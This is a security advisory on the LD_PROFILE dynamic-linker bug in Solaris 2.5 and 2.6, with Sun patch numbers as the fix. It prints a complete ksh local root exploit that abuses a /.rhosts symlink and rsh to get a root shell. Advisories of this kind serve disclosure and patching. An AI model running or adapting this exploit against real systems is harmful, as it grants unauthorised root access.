COMMAND

    LD_PROFILE

SYSTEMS AFFECTED

    Solaris 2.5, 2.6

PROBLEM

    Steve Mynott posted following.  It's local root exploit:

        #! /bin/ksh
        #  LD_PROFILE local root exploit for solaris
        #  steve@tightrope.demon.co.uk 19990922
        umask 000
        ln -s /.rhosts /var/tmp/ps.profile
        export LD_PROFILE=/usr/bin/ps
        /usr/bin/ps
        echo + + >  /.rhosts
        rsh -l root localhost csh -i

SOLUTION

    This is bug 4150646 (or rather, 1241843, which resurfaced after an
    extensive rewrite  of the  dynamic linker).   It's been  fixed  in
    Solaris 7 and with the following patches in other releases:

        103242-07: SunOS 5.5: linker patch
        103243-07: SunOS 5.5_x86: linker patch
        103627-11: SunOS 5.5.1: Linker patch
        103628-10: SunOS 5.5.1_x86: Linker patch
        105490-07: SunOS 5.6: linker patch
        105491-05: SunOS 5.6_x86: linker patch

    The  bug  was  originally  fixed  in  5.5.1  and back patched, but
    rediscovered back in 2.6 (which  also meant it was in  the process
    of being patched  back into 5.5/5.5.1);  this was all  well before
    S7  was  released.   The  original  bug  was  also  fixed  in  the
    following patches:

        102049-05: SunOS 5.4: linker fixes
        102303-05: SunOS 5.4: POINT PATCH: linker fixes
        102304-05: SunOS 5.4_x86: POINT PATCH: linker fixes
        102778-03: SunOS 5.4_x86: linker patch